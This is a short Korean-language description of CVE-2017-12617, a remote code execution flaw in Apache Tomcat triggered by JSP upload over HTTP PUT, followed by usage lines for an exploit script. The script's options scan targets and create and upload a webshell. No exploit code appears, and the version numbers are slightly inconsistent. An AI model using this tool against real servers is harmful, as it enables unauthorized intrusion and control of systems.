
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP 업로드 우회 / 원격 코드 실행
CVE-2017-12617은 Apache Tomcat에서 발견된 치명적인 원격 코드 실행(RCE) 취약점입니다.
HTTP PUT가 활성화된 시스템(Default 서블릿의 "read-only" 초기화 파라미터를 "false"로 설정)이 영향을 받습니다.
9.0.1(Beta), 8.5.23, 8.0.47, 7.0.82 이전의 Tomcat 버전은 잠재적으로 위험한
원격 코드 실행(RCE) 취약점을 포함하며, 모든 운영 체제에서 기본 서블릿이
readonly 파라미터를 false로 설정하거나 WebDAV 서블릿이 활성화되고
readonly 파라미터가 false로 설정된 경우 영향을 받습니다.
./cve-2017-12617.py [options]
옵션:
-u ,--url [::] 대상 URL이 취약한지 확인
-p,--pwn [::] 웹쉘 생성 및 업로드
-l,--list [::] 호스트 목록
[+]사용법:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt